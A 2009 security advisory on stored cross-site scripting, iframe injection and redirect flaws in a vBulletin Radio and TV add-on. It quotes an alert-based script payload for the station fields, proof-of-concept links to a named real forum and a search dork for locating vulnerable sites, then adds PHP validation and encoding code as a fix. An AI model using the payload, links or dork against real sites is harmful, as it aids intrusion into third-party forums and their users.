vBulletin Radio And TV Player Cross Site Scripting

2009-06-15T00:00:00
ID PACKETSTORM:78410
Type packetstorm
Reporter d3v1l
Modified 2009-06-15T00:00:00

Description

                                        
`vBulletin Radio and TV Player Add-On (all versions) - XSS, Iframe Injection and Redirect Vulnerability
  
About:-   
  
Radio and TV Add-on will add a radio and TV library to your forum.  
  
Features:-   
  
- Users can add / delete / edit own stations  
  
For more info about this plugin, see: http://www.vbulletin.org/forum/showthread.php?t=152037&page=2
  
Note:-   
  
- Exploiting this bug requires a registered account. Once registered, you can add a new radio station
where the station name can be "><script>alert(String.fromCharCode(88,83,83))</script>
and the URL "><script>alert(String.fromCharCode(88,83,83))</script>
  
  
Poc: XSS   
  
http://www.musicadigitale.net/forum/radioandtv.php?station=92   
  
Poc: Iframe   
  
http://www.musicadigitale.net/forum/radioandtv.php?station=93   
  
Poc: Redirect   
  
http://www.musicadigitale.net/forum/radioandtv.php?station=94  
  
dorks:- inurl:radioandtv.php   
  
Bug found by d3v1l [Avram Marius]
  
Date: 14.06.2009   
  
https://security-shell.ws/forum.php   
http://security-sh3ll.blogspot.com   
  
`
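
One way to close the two injection points named in the Note (station name and station URL), shown as an added example that is not the add-on's own code. The function names, the http/https allow-list and the stream.example URL are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not taken from the Radio and TV add-on.

// Assumption: stations are ordinary web streams, so only http/https are accepted.
const ALLOWED_SCHEMES = ['http', 'https'];

// Encode a value for use in HTML text or inside a quoted attribute.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Return the URL if it is an absolute http(s) URL with a host, otherwise null.
function validate_station_url(string $url): ?string
{
    $url = trim($url);
    // Reject control characters, whitespace, quotes and angle brackets outright.
    if ($url === '' || preg_match('/[\x00-\x20"\'<>\x7f]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ALLOWED_SCHEMES, true)) {
        return null;
    }
    return $url;
}

// Render one station link; returns null when the stored URL is not acceptable.
function render_station(string $name, string $url): ?string
{
    $safeUrl = validate_station_url($url);
    if ($safeUrl === null) {
        return null;
    }
    return '<a href="' . h($safeUrl) . '" rel="noopener noreferrer">' . h($name) . '</a>';
}

// Constructed input: the name/URL value quoted in the advisory's Note.
$payload = '"><script>alert(String.fromCharCode(88,83,83))</script>';
// First call uses the payload as the URL, second pairs it with a constructed valid URL.
var_dump(render_station($payload, $payload));
echo render_station($payload, 'http://stream.example/live'), "\n";
```

Validation belongs at the point where a station is saved, and the encoding at every place the stored name or URL is written into a page, so that rows stored before the fix are also rendered safely.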